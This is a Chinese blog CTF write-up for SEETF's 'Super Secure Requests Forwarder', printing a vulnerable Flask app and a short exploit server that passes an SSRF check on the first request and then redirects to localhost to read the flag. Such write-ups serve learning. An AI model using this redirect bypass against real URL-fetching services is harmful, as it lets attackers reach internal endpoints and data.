[SEETF]Super Secure Requests Forwarder

最新推荐文章于 2024-07-04 16:04:39 发布
最新推荐文章于 2024-07-04 16:04:39 发布
阅读量254 收藏
点赞数
分类专栏: ctf 文章标签: python 后端 flask web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/125149348
版权

1NDEX

0x00 前言

闲来无事打打 发现自己菜到家了

0x01 brain.md

from flask import Flask, request, render_template
import os
import advocate
import requests

app = Flask(__name__)


@app.route('/', methods=['GET', 'POST'])
def index():

    if request.method == 'POST':
        url = request.form['url']

        # Prevent SSRF
        try:
            advocate.get(url)

        except:
            return render_template('index.html', error=f"The URL you entered is dangerous and not allowed.")

        r = requests.get(url)
        return render_template('index.html', result=r.text)

    return render_template('index.html')


@app.route('/flag')
def flag():
    if request.remote_addr == '127.0.0.1':
        return render_template('flag.html', FLAG=os.environ.get("FLAG"))

    else:
        return render_template('forbidden.html'), 403


if __name__ == '__main__':
    app.run(host="0.0.0.0", port=80, threaded=True)

advocate库还是第一次见 google一下就是防ssrf的库
天真地把自己知道的所有姿势都fuzz了一遍
无一例外地被拦下了
看了一下exp恍然大悟

exp.py

from flask import Flask, redirect

app = Flask(__name__)

i = 0

@app.route('/')
def index():
    global i

    if i == 0:
        i += 1
        return 'Nothing to see here'

    else:
        return redirect('http://localhost/flag')


if __name__ == '__main__':
    app.run(host="0.0.0.0", port=80, threaded=True)

evil_server再接受请求时能返回不同的结果
再回头看看源码 (果然还是不够细~
在这里插入图片描述
验证机制中看到 只有第一次try时使用了advocate
下面就直接 r=requests.get(url) 了
那么服务器第一次和第二次返回不同的结果就直接bypass了

在这里插入图片描述

0x02 rethink

最近忙着期末 遗失了之前沉浸思考的状态了
希望今天是个转折 后续还能有些高质量输出
这篇确实太水了

k_du1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flask在Windows环境下的部署
weixin_34162629的博客
02-11 3085
背景 由于目前在用的Flask项目涉及到一部分依赖Windows的处理,还无法迁移到linux平台,那么在windows环境下,要怎么部署呢? 思路 根据Flask官网介绍,由于Flask内置的服务器性能不佳,推荐的主要的部署方式有如下几种: mod_wsgi (Apache) 独立 WSGI 容器 Gunicorn Tornado...
[2022SEETF]Sourceless Guessy Web (pearcmd+rce)
Landasika的博客
06-11 930
参考链接 pearcmd.php 正常情况下,pearcmd.php的文件位置在/usr/local/lib/php/pearcmd.php 也就是说在argv的情况下,pearcmd.php是通过$_SERVER[‘argv’]来获取参数的。那么我们现在就要利用test2.php来看一下$_SERVER[‘argv’]是如何解析参数的。从上面的三个例子中我们发现了一些问题:1.&符无发分割参数,真正能分割参数的是加号2.等号无法赋值,而是会直接被传进去当作参数。 pear命令实质上就是调用了pearcmd
巡风使用
越开源越幸运
10-23 1万+
成功后开启流程 Windows D:\Program Files\MongoDB\Server\3.4\bin>mongod.exe --port 65521 --dbpath "D:\MongoDB\DBData" run.bat 浏览器登录localhost:8000 (端口为自己配置的) 账号admin 密码xunfeng321 Linux ~$ cd xunfeng...
python实现Flask启动app.run(host='0.0.0.0',port=5000)
热门推荐
ChasingdreamLY的博客
01-13 6万+
记录一个小坑。 这段时间用Flask写了一个小项目,用于局域网内提供restful服务,起到一个连接各个软件的作用吧,然后今天查了一下: from flask import Flask # Flask初始化参数尽量使用你的包名,这个初始化方式是官方推荐的,官方解释:http://flask.pocoo.org/docs/0.12/api/#flask.Flask app = Flask(_...
使用python搭建简易的校时服务
kongcz的专栏
05-27 809
背景 为了方便设备运维,在公司虚拟机上搭建了两台zabbix服务器。这两台机子过段时间老是时间不准,定期手动校时太麻烦,机器又不能联网,没法使用网络校时。内网搭建了ntp服务器使用ntp校时又因为各种诡异的原因无法使用,这两台服务器也不需要特别精确的时间,所以想到用python搭建一个简易的服务来校时。 方案思路 现网正好又一台服务器可以联网校时,而且这台服务器上搭建了flask的一个业务。我只要在这个业务上加一个接口返回当前时间,zabbix服务器上请求这个接口获取时间,并使用os模块校准时间就可以
python-requests离线包
04-15
本离线包“python-requests”正是为了解决在无网络环境下也能使用这个库的需求。 首先,我们来详细解释一下压缩包中的各个文件: 1. `python-3.7.4-amd64.exe`: 这是Python 3.7.4的安装程序,适用于AMD64架构的...
requests原理.docx
07-18
requests原理 requests 库是 Python 中的一个常用的第三方库,用于发送 HTTP 请求。它提供了一组简洁而强大的 API,使得在 Python 中进行网络请求变得更加方便。下面是 requests 库的简单原理解释: 创建请求 ...
python requests.get带header
09-16
`requests.get()`方法就是实现这一功能的关键。 当我们调用`requests.get()`时,可以通过传递一个`headers`参数来添加自定义的HTTP头部。例如: ```python import requests headers = { 'User-Agent': 'Mozilla/...
Python requests获取网页常用方法解析
09-17
在本篇文章中,我们将深入探讨如何使用requests库获取网页内容,并通过具体的示例代码进行详细解析。 首先,我们需要导入requests库,这通常是在Python脚本的开头完成的: ```python import requests ``` `...
Python requests上传文件实现步骤
09-16
在`requests.models.py`中,`request`方法接收各种参数,包括`data`和`files`。`data`参数用于处理表单数据,而`files`参数则用于处理文件上传。 当同时提供`data`和`files`时,`request`方法会创建一个`...
flask中 app.run(host='0.0.0.0', port=5000, debug=False) 不能用外网ip访问的解决办法
james_laughing的博客
03-21 1万+
pycharm 2018开启debug模式和修改host: 在Pycharm 2018中,如果想要开启debug模式和更改端口号,则需要编辑项目配置。直接在app.run中更改是无效的。示例图如下: 将 app.run() 改成 app.run(debug=False) 保存文件,重新运行,就可以了。 ...
部署Flask项目到腾讯云服务器CentOS7
weixin_30856725的博客
12-30 167
部署Flask项目到腾讯云服务器CentOS7 安装git yum install git 安装依赖包 支持SSL传输协议 解压功能 C语言解析XML文档的 安装gdbm数据库 实现自动补全功能 sqlite数据库: yum install openssl-devel bzip2-devel expat-devel gdbm-devel readline-devel sqlit...
FDFS部署中遇到的几个bug坑,已解决
思研
03-29 1万+
1.不能上传文件到storage:,tracker_query_storage fail, error no: 2, error info: No such file or directory 问题: 1.storage的配置文件中图片的保存路径中的文件夹名字写错(注意:这个问题是最容易出现的) 2. storage的防火墙没有关闭 解决: 1. 关闭防火墙 2.查看配置文件,错误的地...
解决nginx报错: [warn] conflicting server name “localhost“ on 0.0.0.0:80, ignored
徊忆羽菲
12-09 6万+
nginx: [warn] conflicting server name "localhost" on 0.0.0.0:80, ignored分析原因解决方案 分析原因 修改nginx配置参数后,使用nginx -t检查配置. 提示successfull后就可以使用 nginx -s reload来重新加载配置 我配置的过程中遇到这样的问题,就是绑定了主机名后,重新加载配置时会出现警告 nginx: [warn] conflicting server name "localhost" on 0.0.0.0
flask 启动报错s.bind(server_address)PermissionError: [Errno 13] Permission denied
Shen1105的博客
07-07 2301
原因是启动的时候,端口设置问题, 启动文件设置的为: app.run(port=80) 修改大于1024即可,我设置的为8080 启动成功
FLASK 开发后台应用 加载速度时快时慢 waiting TTFB时间长 的解决办法
m0_60381212的博客
08-11 1912
思考: 以为后端代码问题,用简单逻辑代码测试,还是10次利有两三次加载换吗,waiting (TTFB)达到1min 网上说localhost 改成127.0.0.1 我的就是127.0.0.1了 在项目入口就开始定位每一步执行时间,都是毫秒级的,再次印证不是后端代码问题 有说是nginx配置问题,我用的还是flask自带web服务器 前端框架的加载问题,我的都是毫秒级的 有病乱投医 最后发现问题 你可能会遇到的主要问题是服务器是单线程的。这意味着它将一次连续地处理每个请求。这意味着,如果..
【代码运行服务】并发运行冲突
sysu_lluozh
01-06 626
代码运行服务稳定的使用了一段时间,但是有用户反馈测试计划的断言有时候会出现断言失败。但是单独执行用例不会出现这样的情况 啥原因捏? 定位时发现执行了关键字函数断言,确实在测试计划执行时概率性的断言失败,返回`None`或者`500 error` 查看该关键字函数的代码,若非异常,该函数应返回`True` 或者 `False`,但现在概率性出现返回`None`或者`500 error`,而且仅在测试计划执行时出现 以上信息基本可以确认并发执行导致该问题的出现
Flask文件上传
菲宇运维
03-18 376
1.1.上传文件和访问上传的文件 upload_file_demo.py from flask import Flask,request,render_template import os from werkzeug.utils import secure_filename from flask import send_from_directory app = Flask(__...
Java基础:爬虫
最新发布
weixin_65752158的博客
07-04 843
Pattern:表示正则表达式Matcher:文本匹配器,作用按照正则表达式的规则去读取字符串,从头开始读取。在大串中去找符合匹配规则的子串。通过Pattern p = Pattern.compile("正则表达式");获得 通过Matcher m = p.matcher(str);获得 (m要在str中找符合p规则的小串)其中, m为Matcher对象, p为正则表达式规则, str为要验证的字符串. boolean b = m.find(); 表示拿着文本匹配器从头开始读取,寻找是否有
requests模块
04-16
以下是requests模块的一些常用功能: 1. 发送GET请求: ``` import requests response = requests.get(url) ``` 2. 发送POST请求: ``` import requests response = requests.post(url, data=data) ``` 3....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值